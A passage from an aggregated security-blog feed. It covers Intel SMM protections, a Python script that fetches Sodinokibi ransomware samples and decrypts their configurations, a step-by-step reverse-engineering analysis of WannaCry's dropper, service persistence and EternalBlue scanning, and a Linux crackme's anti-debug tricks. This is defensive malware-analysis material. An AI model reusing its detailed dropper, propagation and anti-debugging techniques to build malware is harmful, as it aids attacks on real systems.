IRBR, or Intel Runtime BIOS Resilience, runs the SMI handler in protected mode with paging enabled, with a page table set up to only map SMRAM, as well as CPU protection to prevent changes to the paging table in SMM mode.

STM - SMM Transfer Monitor, means that most of the SMI handler virtualized, with only a small part called the STM serving as its hypervisor. I don't think is actually implemented in UEFI.

PPAM - also called Nifty Rock or Devil's Gate Rock, tries to fill the gap between IRBR and STM by prepending an Intel entry-point to the SMI handler. Intel supplies a signed module called PPAM that can measure certain attributes of the SMI handler and report them to the OS. The OS can then make a policy decision on how to proceed. All SMI handler must also be registered in a table called the WSMT table. The firmware's WSMT tables declares to the OS that the firmware guarantees three things: FixedCommBuffers - a guarantee that the SMM will vaildate that the input/output buffers of the operation, CommBufferNestedPtrProtection that extends this guarantee to any pointers within input/output structures, and SystemResourceProtection that indicated that the SMI handler will not reconfigure the hardware.

Memory Reset protections

After a warm boot or even a fast cold boot some secrets (keys) might remain in memory. Intel provides security for these secrets using special TXT Secrets registers.

Starting a blog at this time

1 February 2021 at 05:00

Is this a good time to start a new cyber security blog?

I have been working in cybersecurity for quite some time, but have always been afraid of writing publicly about my work: afraid of being publicly rediculed for my work, afraid of my english proficiency and afraid in general.

When I finally got the curage to start the North Korean blog thing happened, litterally a half hour before starting, throwing me way down.

But finally I decided to go anyway.

I’ll be posting a lot of my backlog in the next few weeks, including: the Intel PC boot process, intel uCode stuff, expereicnes as a blue teamer.

Lets hope someone somewhere ever reads these words.

Too-doo-loo, Igor

Project Sodinokibi

29 October 2020 at 08:59
By: Kartone

Learning Python

Project Sodinokibi

Python is the language I always wanted to learn. I tried but failed every single time, don't know exactly why. This time was different though, I knew from the first line of code. So, with a little push of a dear friend of mine (thanks Elio!), I tried to investigate how to decode Sodinokibi ransomware configurations for hundreds, maybe thousands, of samples. I intended to understand, using powerful insights from VirusTotal Enterprise API, if there are relationships between Threat Actor, mapped inside the ransomware configuration, and the country visible from the VirusTotal sample submission.
I am perfectly aware that it's not as easy as it seems: the ransomware sample submission's country, visible from VirusTotal, may not be the country affected by the ransomware itself. But, in one case of another, I think there could be somehow a link between the two parameters: maybe from the Incident Response perspective.

Getting the samples

My first step was to get as many samples as I could. My first thought was to use VirusTotal API: I'm lucky enough to have an Enterprise account, but the results were overwhelming and, due to the fact I was experimenting with Python, the risk of running too many requests and consume my threshold was too high. So I opted to use another excellent malware sharing platform: Malware Bazaar by Abuse.ch

All the code is available here

downloaded_samples = []
data = { 'query': 'get_taginfo', 'tag': args.tag_sample, 'limit': 1000 }
response = requests.post('https://mb-api.abuse.ch/api/v1/', data = data, timeout=10)
maldata = response.json()
print("[+] Retrieving the list of downloaded samples...")
	for file in glob.glob(SAMPLES_PATH+'*'):
        filename = ntpath.basename(os.path.splitext(file)[0])
        downloaded_samples.append(filename)
    print("[+] We have a total of %s samples" % len(downloaded_samples))
    for i in range(len(maldata["data"])):
        if "Decryptor" not in maldata["data"][i]["tags"]:
            for key in maldata["data"][i].keys():
                if key == "sha256_hash":
                    value = maldata["data"][i][key]
                    if value not in downloaded_samples:
                        print("[+] Downloading sample with ", key, "->", value)
                        if args.get_sample:
                            get_sample(value)
                        if args.clean_sample:
                            housekeeping(EXT_TO_CLEAN)
        else:
            print("[+] Skipping the sample because of Tag: Decryptor")

This block of code essentially builds the request for the back-end API where the tag to search for comes from the command line parameter. I defaulted it to Sodinokibi. It then creates a list of samples already present in the ./samples directory not to download them again. Interestingly, because there are many Sodinokibi decryptors executables on the Malware Bazaar platform, I needed some sort of sanitization not to download them. When it founds a sample not present inside the local directory, It then calls the function to download it.

def get_sample(hash):
    headers = { 'API-KEY': KEY } 
    data = { 'query': 'get_file', 'sha256_hash': hash }
    response = requests.post('https://mb-api.abuse.ch/api/v1/', data=data, timeout=15, headers=headers, allow_redirects=True)
    with open(SAMPLES_PATH+hash+'.zip', 'wb') as f:
        f.write(response.content)
        print("[+] Sample downloaded successfully")
    with pyzipper.AESZipFile(SAMPLES_PATH+hash+'.zip') as zf:
        zf.extractall(path=SAMPLES_PATH, pwd=ZIP_PASSWORD)
        print("[+] Sample unpacked successfully")

A straightforward function: builds the API call, gets the zipped sample, unpack, and saves it inside the directory ./samples. Note that the sample filenames are always their SHA-256 hash. After unpacking it, I made a small housekeeping function to get rid of the zip files.

def housekeeping(ext):
    try:
        for f in glob.glob(SAMPLES_PATH+'*.'+ext):
            os.remove(f)
    except OSError as e:
        print("Error: %s - %s " % (e.filename, e.strerror))

This is what happens when you run the script.

Getting insights on ransomware configuration

Now it's time to analyze these samples to get the pieces of information we need. The plan is to extract the configuration from an RC4 encrypted configuration stored inside a PE file section. Save ActorID, CampaignID, and executable hash. With the latter, we then query VirusTotal API to get insights for the sample submission: the City and the Country from where the sample was submitted and when there was the submission. As I wanted to map these pieces of information on a map, with OpenCage API I then obtained cities coordinates of the submissions.

The code to build the API calls and parse the response JSON is rough, shallow and straightforward I would not go with it. I'm sure there are plenty of better ways to do its job, but...it's my first time with Python! So bear with me, please. What I think it's interesting is the function that extracts and decrypts the configuration from the ransomware executable PE file. These are the lines of code that do this task:

excluded_sections = ['.text', '.rdata', '.data', '.reloc', '.rsrc', '.cfg']

def arc4(key, enc_data):
    var = ARC4.new(key)
    dec = var.decrypt(enc_data)
    return dec

def decode_sodinokibi_configuration(f):
    filename = os.path.join('./samples', f)
    filename += '.exe'
    with open(filename, "rb") as file:
        bytes = file.read()
        str_hash = hashlib.sha256(bytes).hexdigest()
    pe = pefile.PE(filename)
    for section in pe.sections:
        section_name = section.Name.decode().rstrip('\x00')
        if section_name not in excluded_sections:
            data = section.get_data()
            enc_len = struct.unpack('I', data[0x24:0x28])[0]
            dec_data = arc4(data[0:32], data[0x28:enc_len + 0x28])
            parsed = json.loads(dec_data[:-1])
            return str_hash, parsed['pid'], parsed['sub']
            #print("Sample SHA256 Hash: ", str_hash)
            #print("Actor ID: ", parsed['pid'])
            #print("Campaign ID: ", parsed['sub'])
            #print("Attacker's Public Encryption Key: ", parsed['pk']) 

Disclaimer: these lines are, obviously, not mine. I modified the script provided by the guys of BlackBerry ThreatVector. I invite you to read where they explain how the configuration is stored within the section, where's the RC4 encryption key and how to decrypt it.

In my version of the script, it runs on Python3 and uses a standard library for the RC4 algorithm. Also, it's worth to mention that this script fails if input samples are packed. It expects the existence of the particular section with the saved encrypted configuration; it fails otherwise. I added some controls to handle miserable crashes, but there are unmanaged cases still: I'm so new to Python!

In the end, we have a dear old CSV file enriched with a bunch of information: Country, City, Latitude, Longitude, ActorID, CampaignID, Hash, Timestamp. We're ready to map it.

Understanding the data

Our data is described inside a data.csv

Project Sodinokibi

Field aid (ActorID) is changed, during the months, from an integer number, like ActorID: 39 to a hash representation. For now, we have only 174 samples where we managed to extract the configuration. We can now group the data by aid field and count the submissions.

Project Sodinokibi

From what I see, I can understand that the samples related to ThreatActor with the ID 39 have nine submissions from the city of Ashburn US. I have to comprehend why this city has so many submissions related to Sodinokibi. I hope that someone that reads this post would help me to understand and shed some light.

If we map the ThreatActorID vs the City of the submission, we can easily see the data.

Project Sodinokibi
ThreatActors vs Submissions City
Project Sodinokibi
Submissions City vs Submissions count

Next steps would be acquiring as many samples as I can. The best choice would be using VirusTotal API to retrieve the samples and this is what I'm going to do. Hopefully I won't burn my entire Company API limit.

All the scripts used in this post, the data and the Jupiter notebook used to map the data is available here.

Tools Update vs Latest Maldocs

25 May 2020 at 12:00
A couple of tools have been updated to make it easier to handle the latest malicious documents...

Another Way to Analyze XLM Macros

17 April 2020 at 12:00
XLM macros have been making a comeback so it's important to be able to analyze them. I wrote a proof of concept tool that provides insight into what it's doing...

Choose Again.

28 February 2020 at 13:50
By: Kafeine

This is the last post/activity you’ll see on MDNC.

I have now chosen to bring the MDNC (Blog/Kafeine/MISP) project to an end.
Thanks to those who helped me during this incredible 8 years journey.

The blog and twitter account will stay up (but inactive) for the records.
The MDNC MISP instance will be shut down in several weeks.

β€˜Choose again.’ said Aenea. β€˜Dan Simmons, The Rise of Endymionβ€˜

That’s all Folks!

Emotet Stats

1 February 2020 at 12:00
The Emotet gang's email lures, which takes advantage of current news events, seems to be quite convincing and successful...

Reversing a Self-Contained Phishing Page

12 December 2019 at 12:00
I came across this SANS ISC blog article called "Phishing with a self-contained credentials-stealing webpage"...

WannaCry, two years later: a deep look into its code

23 May 2019 at 09:17
By: Kartone
WannaCry, two years later: a deep look into its code

My own technical analysis of the malware that, in 2017, spread like wildfire encrypting thousands of computers, using one of the tools leaked from the National Security Agency by the group named ShadowBrokers.

Almost two years passed after that weekend of May 2017, when the crypto-worm WannaCry infested the net thanks to the EternalBlue exploit. In roughly two days, WannaCry spread itself all over the world infecting almost 230.000 computers in over 150 countries:

WannaCry, two years later: a deep look into its code
By TheAwesomeHwyh

At that time, working as an Information Security Officer, with my colleagues, especially the guys from IT Infrastructure dept., worked hard to keep the entire Company perimeter safe. Luckily for us, we were not hit by the ransomware, but a lot of effort was spent explaining to the rest of the Company what happened.

Flash forward to 2019

Since this January, I've been running my own Dionaea honeypot that keeps catching a huge number of WannaCry samples. Just to give you some numbers, within two months, the 445 port was hit almost half a million times and I was able to collect roughly 18.000 of its samples at the rate of almost 300 samples per day.

WannaCry, two years later: a deep look into its code

WannaCry, two years later: a deep look into its code

If you notice from the file size, all these samples are all the same, and everyone of them is a WannaCry sample, delivered right to the 445 port in a DLL fashion.

WannaCry, two years later: a deep look into its code

Just to make a contribution to the WannaCry story, though small and useless, I thought it would be fun to analyze the internals of this malware as I wasn't able to do it back in the days. I will concentrate the analysis on its various layers and the most important parts of the code that make this malware unique.

Peeling the onion

First look at one of these samples, confirms that we're dealing with a malicious DLL and it's worth to note its compilation timestamp. Let's call this as launcher.dll because of the evidence found in a string inside the code.

WannaCry, two years later: a deep look into its code
WannaCry, two years later: a deep look into its code

Luckily for us, this sample is not packed. We can check its Import and Export Address Table to get an idea of what this sample is able to do.

WannaCry, two years later: a deep look into its code

Easily enough, checking the imported API, we can assume that the malware uses something in its resource section and supposedly create a file and run a process. Commonly, DLL malware exports functionalities to the outside via its Export Address Table. We can see only one exported function and it's called PlayGame:

WannaCry, two years later: a deep look into its code

As noted above, malware imported some specific APIs to manage its resource section, like FindResourceA and LoadResource. We can easily recognize the magic numbers of a Portable Executable file - a Windows executable file - stored inside this section. We can dump it easily with tools like ResourceHacker:

WannaCry, two years later: a deep look into its code

But before analyzing it, we need to get rid of some bytes in the header, we'll come to these bytes later.

WannaCry, two years later: a deep look into its code

So now, we can open it and check its sections like we just did with the aforementioned DLL. Interestingly this new dumped executable seems 7 years older than the first one, its compile timestamp is dated November 2010 but, be aware that this date can be easily fake.

WannaCry, two years later: a deep look into its code

We can get an idea of what its purpose is by checking out the imported libraries:

WannaCry, two years later: a deep look into its code

We have to expect much more complexity in this stage than the DLL. We have a bunch of standard libraries like KERNEL32.dll or WININET.dll and iphlpapi.dll. This DLL was unknown for me so I found, from MSDN, that:

Purpose
The Internet Protocol Helper (IP Helper) API enables the retrieval and modification of network configuration settings for the local computer.
The IP Helper API is applicable in any computing environment where programmatically manipulating network and TCP/IP configuration is useful. Typical applications include IP routing protocols and Simple Network Management Protocol (SNMP) agents.

WannaCry, two years later: a deep look into its code

A quick look suggests that this executable operates with Windows services configuration, manages files and resources and also, has network capabilities:

WannaCry, two years later: a deep look into its code

The Plan

My plan is to give a deep look inside all various stages that the malware extracts during its execution, analyzing its code and how it interacts with internal Windows subsystems.

For this reason, we're now stepping back to analyze and understand how the DLL extracts this executable in the first place. Then we'll give a look inside the debugger to see how things happen in realtime and then, we will analyze and try to understand what this executable is going to do once it infects the system.

Analysis of the first layer: launcher.dll

The purpose of this DLL is exactly what we supposed thanks to the analysis of the imported libraries. The only exported function PlayGame is easily disassembled by IDAPro.

WannaCry, two years later: a deep look into its code

The first call to sprintf compose the Dest string as C:\WINDOWS\mssecsvc.exe. Then it calls two functions, sub_10001016 that extracts, from its resource section, the executable we dumped before and then, saves it into a new file named as Dest string; after that sub_100010AB runs the file. Notice that we have just gained our first host-based indicator: C:\WINDOWS\MSSECSVC.EXE for this malware detection.

Function sub_10001016 aka ExtractAndCreate

For better reading and understanding this function, we can rename it as ExtractAndCreate and we can split it into two parts: the extract part and the create file part.

WannaCry, two years later: a deep look into its code
Disassembled extract part

During this phase, the malware uses four API calls, that are completely covered inside the MSDN.

  • FindResourceA: Determines the location of a resource with the specified type and name in the specified module.
  • LoadResource: Retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.
  • LockResource: Retrieves a pointer to the specified resource in memory.
  • SizeOfResource: Retrieves the size, in bytes, of the specified resource.

That being said, we can now analyze step by step this simple four blocks of code. First function prototype is:

HRSRC FindResourceA(
  HMODULE hModule,
  LPCSTR  lpName,
  LPCSTR  lpType
);

We have three function parameters that, as per calling convention, must be pushed in reverse order, so:

push    offset Type ; "W"
push    65h ; lpName
push    hModule ; hModule
call    ds:FindResourceA

Parameter hModule is being populated inside the DLLMain method, and is equals to variable hinstDLL.

WannaCry, two years later: a deep look into its code

hinstDLL: A handle to the DLL module. The value is the base address of the DLL. The HINSTANCE of a DLL is the same as the HMODULE of the DLL, so hinstDLL can be used in calls to functions that require a module handle.

lpName: The name of the resource. In this case, name is 0x65 or 101 in decimal value. If you look, name is confirmed by analyzing the DLL with ResourceHacker:

WannaCry, two years later: a deep look into its code

lpType: The resource type. Can be also noticed in the screenshot above.

From MSDN: If the function succeeds, the return value is a handle to the specified resource's information block. To obtain a handle to the resource, pass this handle to the LoadResource function. If the function fails, the return value is NULL.

Coming back to the disassembly, this handle is returned into EAX and then moved inside EDI, where is being tested to check if it's null. If it's not, the handle is pushed, as the second argument, to the next API call to LoadResource. Quoting MSDN: it retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory. It also suggests:"...to obtain a pointer to the first byte of the resource data, call the LockResource function; to obtain the size of the resource, call SizeofResource".

HGLOBAL WINAPI LoadResource(
  _In_opt_ HMODULE hModule,
  _In_     HRSRC   hResInfo
);

hModule: A handle to the module whose executable file contains the resource.

hResInfo: A handle to the resource to be loaded.

The same approach applies with the other two API calls: LockResource and SizeofResource. The interesting thing to note here is that the return value from this last call, stored inside EAX register as 500000, won't be used at all:

WannaCry, two years later: a deep look into its code

So now, looking in the debugger, we have:

  • EAX = 500000
  • ESI = 10004060

ESI register contains the pointer to the memory region referred to the resource section that contains the executable itself. You can notice it thanks to the MZ header in the memory dump. Remember the 4 bytes that were been removed with hex editor before? According to MSDN this DWORD is the actual size of raw data inside the resource section of the binary itself. So, this value 0x0038D000is moved into EBX and then pushed as lpBuffer to the WriteFile function. Pretty standard call here: CreateFileA will create a file with specific attributes. Parameter dwFlagsAndAttributes, according to MSDN, a value of 0x4stands for: "The file is part of or used exclusively by an operating system".

WannaCry, two years later: a deep look into its code

After the call to WriteFile, we have our executable saved and ready to run. The interesting parameters for this call are:

  • lpBuffer: equals to ESI, is the value returned by the call to LockResource and is a pointer to the buffer to write into the file. Basically is a pointer to the binary inside the resource section.
  • nNumberOfBytesToWrite: as we said earlier, this parameter is the value pointed by the ESI to a DWORD inside of resource header. Its value represent the size of the binary data.

So now, we can enable a breakpoint right after the WriteFile call and get the freshly created executable.

WannaCry, two years later: a deep look into its code

Function sub_100010AB aka RunTheFile

Here we're dealing with a very simple API call to CreateProcessA, nothing fancy to add. I'd prefer not to dig inside all these parameters, it's completely covered inside the MSDN.

WannaCry, two years later: a deep look into its code

Conclusion after the first layer

What I would show here is my own study process: be aware, sometimes it can be very, very time-consuming but it gives me a big, complete and deep look inside Windows internals and how malware uses them. This proceeding, for me as a novice, helped a lot.

Analysis of the second layer: mssecsvc.exe

This will differs from the DLL file. As we noted initially, this executable is way more complex: we'll deal with various libraries and functionalities. But all start with a (Win)main function, right?

WannaCry, two years later: a deep look into its code

Do you remember the kill-switch? Do you remember the story behind? Give it a read, it's very interesting.

In general terms, the main function of a Windows program is named WinMain, this is the first function that will be called when the program starts. We see a very strange url inside this code. Exactly the string is: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com and is referred through the EDI register. After that, the WinINet subsystem is initialized using the call to InternetOpenA, this function returns a valid handle that the application passes to subsequent WinINet functions. Next, there's a call to InternetOpenUrlA that opens a resource specified by a complete FTP or HTTP URL. After that the handle is closed and a new function is called: sub_408090, we'll name it ServiceStuff:

WannaCry, two years later: a deep look into its code

In the first block of code, according to MSDN: GetModuleFileNameA retrieves the fully qualified path for the file that contains the specified module. The module must have been loaded by the current process, first parameter hModule is the handle to the loaded module whose path is being requested. If this parameter is NULL, GetModuleFileNameA retrieves the path of the executable file of the current process. Here the value is set to NULL, so it retrieves the name of the executable itself:

WannaCry, two years later: a deep look into its code

We then find a check on the number of arguments: if there are arguments the TRUE path will be taken. Because, in our case, we're debugging without any argument, the FALSE path is taken and a new function sub_407F20 is called. This is a simple function that calls other two, so let's call it FunctionCaller:

WannaCry, two years later: a deep look into its code

Simple enough sub_407C40 create a new service and then starts it, so we name it CreateAndStartService. Service will be run with command line mssecsvc.exe -m security and with a display name as "Microsoft Security Center (2.0) Service" defined as "mssecsvc2.0".

WannaCry, two years later: a deep look into its code

When we move then to sub_407cE0, things start to become fun. For the sake of simplicity, we'll analyze this function in four parts. The first part is easy because the malware dynamically resolve some APIs:

WannaCry, two years later: a deep look into its code

Nothing too much complicated here: it uses GetProcAddress to populate some variables with the address of specific APIs, so it can call them in the next lines of code. After that, the second part will manage the resource section, just like the way we analyzed in the DLL launcher.dll:

WannaCry, two years later: a deep look into its code

This is confirmed into the debugger:

WannaCry, two years later: a deep look into its code

The return value from LockResource, as we know, is the pointer to the resource section into the binary and we can notice the MZ header into the memory dump. We then reach another interesting piece of code:

WannaCry, two years later: a deep look into its code

Two distinct string: Dest and NewFileName, are created using sprintf function. This two evidence are others good host-based indicators:

Dest = C:\WINDOWS\tasksche.exe

NewFileName = C:\WINDOWS\qeriuwjhrf

After that, the old file tasksche.exe is moved into the new file qeriuwjhrf and a new tasksche.exe is created. Now, I found myself lost into somehow obscure code: I got that WriteFile will dump the R resource into the created file tasksche.exe and runs it at the end. What's inside the middle part, for me, remains in the dark.

WannaCry, two years later: a deep look into its code

In situations like this, I prefer to view the code inside the debugger because viewing the code during runtime maybe can help to shed some light. Indeed, seems like It created the command line for the incoming CreateProcessA call.

WannaCry, two years later: a deep look into its code

To recap: this function dumps its resource data inside a new executable file named tasksche.exe, making a copy inside another file named qeriuwjhrf, and then run tasksche.exe /i.

Stepping back to ServiceStuff function, there's the other path to analyze: when there are the arguments "-m security", it enters into service mode. After its initialization, it changes service config:

WannaCry, two years later: a deep look into its code

According to MSDN, it changes the config so that failure actions occur if the service exits without entering a SERVICE_STOPPED state. After that, it executes its ServiceFunction:

WannaCry, two years later: a deep look into its code

This function setup the handles and starts exploiting the MS17-010 vulnerability into the reachable networks. Note that it exits after 24h. Here, I renamed this function ExecuteEternalBlue

WannaCry, two years later: a deep look into its code

This call starts a number of events that let the infection to happen. First thing, Winsock subsystem is initialized and a CryptoContext is generated:

WannaCry, two years later: a deep look into its code

Next, the malware will load a DLL into the memory - the very same launcher.dll we analyzed before - and then run it. Networks attacks happen inside two new threads. This flow can be easily observed if we decompile this function:

WannaCry, two years later: a deep look into its code

The first thread, involving the function sub_407720, will enumerates local network adapters and generates IP addresses compatible for those networks. For every IP, it tries to connect to port 445 and, if successful, launch the attack. Second thread, involving function sub_407840, will run 128 times with 2 seconds (hex 7D0) delay between each run. It will generates random IP address and tries to connect on port 445, if connection is successful, malware will launch the EternalBlue attack. It's a pretty big chunk of code, but one interesting block of code is this:

WannaCry, two years later: a deep look into its code

Basically the malware, with the random IP placed into the Dest string converted into the proper format, calls sub_407480 aka CreateSocketAndConnect to try a connection to the 445 port, if the connection is successful, real attack is launched within the function sub_407540 aka SMBAttack.

Conclusion after the second layer

So, until now, we got a DLL - launcher.dll - that loads and runs a binary stored inside its resource section,mssecsvc.exe. The very first time, a new service is created to achieve persistence and after that it scans the networks (local and random remote) launching the EternalBlue exploits against 445 ports. In its stand-alone version, it dumps another binary from its resource section and runs it. What's the purpose of this third binary? Let's give a look.

Analysis of the third layer: tasksche.exe

Remember that this executable come from the resource section of previous file, mssecsvc.exe. When it runs as service, locates its resource section and writes it to the disk creating tasksche.exe. When it starts, it first generates a random string based on computer name, then checks if there are some command line arguments, in particular, if there's /i as argument. We have now two branches to analyze:

  • If there's /i argument: it creates specific directories and copies the file over it, like C:\ProgramData\somerandomstring\tasksche.exe and runs it from there.
WannaCry, two years later: a deep look into its code
  • If there's no /i argument: it locates its resource section, named XIA, storing and extracting it onto disk. What's interesting to note here that this resource is a compressed password protected archive. Luckily for us, password is hardcoded in clear text.
WannaCry, two years later: a deep look into its code

Let's give a look inside the archive knowing the password: [email protected]

WannaCry, two years later: a deep look into its code

We can recognize the magic numbers for a ZIP file that we can dump directly and extract.

WannaCry, two years later: a deep look into its code

b.wnry is the bitmap image of the ransomware. Basically what you see as wallpaper when the computer is infected.

WannaCry, two years later: a deep look into its code

c.wnry is the configuration file in clear text, we can see some onion servers and the archive containing the TOR browser.

WannaCry, two years later: a deep look into its code

r.wnry contains some text ransom note.

Inside the msg folder there are some localized ransom note:

WannaCry, two years later: a deep look into its code

Conclusion after the third layer

This new executable seems pretty interesting because basically, it manages all the crypto actions involved within the ransomware. I won't go into this analysis because it's beyond my actual skills and also because, there are plenty of resources available on the internet, from amazing guys that are way better than me. For example, this technical analysis by FireEye was published only few days aftermath and is complete, deep and detailed. I used it a lot to better understand many pieces of obscure code.

Conclusion

I have learned a lot from this research: I learned how malware interacts with their resource section to hide, dump and create files; I learned how malware interacts with Windows service manager and how they actually load DLLs in memory, how they scans networks and how EternalBlue actually works. Also, having available such complete and detailed technical analysis, on this very specific malware, helped me to not loose the direction when I went too deep inside the assembly code. It was very fun and I hope this research will be helpful to someone at least as it was for me. Β 

An extensive step by step reverse engineering analysis of a Linux CTF binary

25 March 2019 at 09:00
By: Kartone
An extensive step by step reverse engineering analysis of a Linux CTF binary

...or, in other words, when failing to reverse a CTF binary makes you lose that job.

During a past job interview, I was tasked to reverse four linux binaries of increasing difficulties as proof of my ability into the reverse engineering field. I solved the first two in a matter of an hour, the third one required me an entire day of work but sadly, I was not able to solve the last one. I don't know if I wasn't selected because of this fail, but it proved me one sure thing: I wasn't prepared enough or, at least, as much as I wanted. Flash forward, I successfully ended up with another job, but that challenge kept staying there, like a small needle, in my head. During the following months, I studied and practiced a lot, mainly into firmware reversing field and, every now and then, I've tried to solve that sneaky challenge.

This is my extensive and detailed description of my fails and success.

Important note

Please note that as this analysis started some months ago and this post was reviewed a huge number of times, you won't find same memory addresses or function names across the screenshots and code snippets.

Running the binary

With what are we dealing?

[email protected]:/opt/ctf# file original 
original: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d0d5b9a34a4fe4c52a3939c75bd71cfa0dc23825, stripped
[email protected]:/opt/ctf# checksec -f ./original
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable  FILE
Partial RELRO   No canary found   NX enabled    PIE enabled     No RPATH   No RUNPATH   No Symbols       No	0		2	./original

A standard, stripped, Linux 32bit binary with no fancy protection active. We're not aiming to exploit it but only to find the flag. A picture is worth a thousand words, they say:

[email protected]:/opt/ctf# ./original
[-] No vm please ;)
[email protected]:/opt/ctf# ./original AAAA
[-] No vm please ;)
[email protected]:/opt/ctf# ./original -h
[-] No vm please ;)
[email protected]:/opt/ctf# ./original AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[-] No vm please ;)
[email protected]:/opt/ctf# 

It doesn't run inside a virtual machine and I definitely don't want to build a physical linux box. Would you tell me some of your internals, please?

[email protected]:/opt/ctf# strace ./original 
execve("./original", ["./original"], 0x7fff2a7dc4f0 /* 48 vars */) = 0
strace: [ Process PID=121645 runs in 32 bit mode. ]
brk(NULL)                               = 0x572fb000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf7f05000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_LARGEFILE|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=133840, ...}) = 0
mmap2(NULL, 133840, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf7ee4000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_LARGEFILE|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\254\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1947056, ...}) = 0
mmap2(NULL, 1955712, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xf7d06000
mprotect(0xf7d1f000, 1830912, PROT_NONE) = 0
mmap2(0xf7d1f000, 1368064, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x19000) = 0xf7d1f000
mmap2(0xf7e6d000, 458752, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x167000) = 0xf7e6d000
mmap2(0xf7ede000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1d7000) = 0xf7ede000
mmap2(0xf7ee1000, 10112, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xf7ee1000
close(3)                                = 0
set_thread_area({entry_number=-1, base_addr=0xf7f060c0, limit=0x0fffff, seg_32bit=1, contents=0, read_exec_only=0, limit_in_pages=1, seg_not_present=0, useable=1}) = 0 (entry_number=12)
mprotect(0xf7ede000, 8192, PROT_READ)   = 0
mprotect(0x565b8000, 4096, PROT_READ)   = 0
mprotect(0xf7f34000, 4096, PROT_READ)   = 0
munmap(0xf7ee4000, 133840)              = 0
clone(child_stack=NULL, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xf7f06128) = 121646
waitpid(121646, [{WIFEXITED(s) && WEXITSTATUS(s) == 1}], 0) = 121646
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=121646, si_uid=0, si_status=1, si_utime=0, si_stime=0} ---
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x1), ...}) = 0
brk(NULL)                               = 0x572fb000
brk(0x5731c000)                         = 0x5731c000
brk(0x5731d000)                         = 0x5731d000
write(1, "**[-] You fool, nobody debugs me!!**"..., 34[-] You fool, nobody debugs me!!!
) = 34
write(1, "1\n", 21
)                      = 2
exit_group(-1)                          = ?
+++ exited with 255 +++

"You fool, nobody debugs me!!!"

Great, after a few couples of runs, we know that there are some anti-VM and anti-debug code in place. Let's look inside.

First thing, I searched and found the strings pretty quickly, and I noticed also two other interesting strings: one for a fail, one for a success.

An extensive step by step reverse engineering analysis of a Linux CTF binary

Digging a little more, we can find where are placed the strings and from where they're used for.

An extensive step by step reverse engineering analysis of a Linux CTF binary

It's clear that the subroutine placed at address 0x566429DC has something to do with them and with the anti-VM/anti-debug tricks.

Analyzing the anti-debug and anti-vm routine

Once I have identified where are the strings involved in this anti-debug and anti-vm tricks, it's easy to find them and visualize the blocks in IDA. Please note that sub_566429DC was here renamed in AntiDebugAntiVM.

An extensive step by step reverse engineering analysis of a Linux CTF binary

This is the graph of the AntiDebugAntiVM functions. In the first block of code, we can see the standard function call convention that setup the stack frame. After that, a bunch of Β NOPS and a call to fork(). Let's understand the fork call, what's its purpose?

fork() creates a new process by duplicating the calling process. The new process, referred to as the child, is an exact duplicate of the calling process, referred to as the parent. On success, the PID of the child process is returned in the parent, and 0 is returned in the child. On failure, -1 is returned in the parent, no child process is created, and errno is set appropriately. (ref)

Basically, right after the fork call, its return value is saved into the EAX register and then moved into a local variable that is compared with the zero value. The first branch is important: if the JNZ is true, we're into the parent process so we're going into the right path. Vice versa, if the instruction is false we're heading to the left or into the child process.

Into the child process

If EAX is zero, or in other terms, we're into the child process, we can see a call to getppid()function that returns the process ID of the parent of the calling process. Β But the important call is the next one, the call to the ptrace() function. The standard definition of this function is:

The ptrace() system call provides a means by which one process (the"tracer") may observe and control the execution of another process(the "tracee"), and examine and change the tracee's memory and registers. It is primarily used to implement breakpoint debugging and system call tracing.

And is defined as:

long ptrace(enum __ptrace_request request, pid_t pid, void *addr, void *data);

In assembly, the call is built with these lines of code:

push    0             ; *data  
push    0             ; *addr  
push    [ebp+var_1C]  ; Parent PID
push    10h           ; _ptrace_request          
call    _ptrace

Basically, the child retrieve its PPID and tries to attach a debugger [1], if it fails, it's the evidence that it is being debugged so sleep 5 seconds, detach and returns [2] . Otherwise returns anyway [3]. Going up a level, if the fork() return -1 so returns with the status code 1 [5]

An extensive step by step reverse engineering analysis of a Linux CTF binary

Into the parent process

If EAX is not zero, we're in the right path, so in the parent process. As you can remember, we have the PID of the child into the EAX register. After the check with -1 into the block [1], it goes into the block [2]. Here, the parent performs a call to waitpid():

push    0                     ; options
lea     eax, [ebp+stat_loc]
push    eax                   ; stat_loc
push    [ebp+pid]             ; child PID
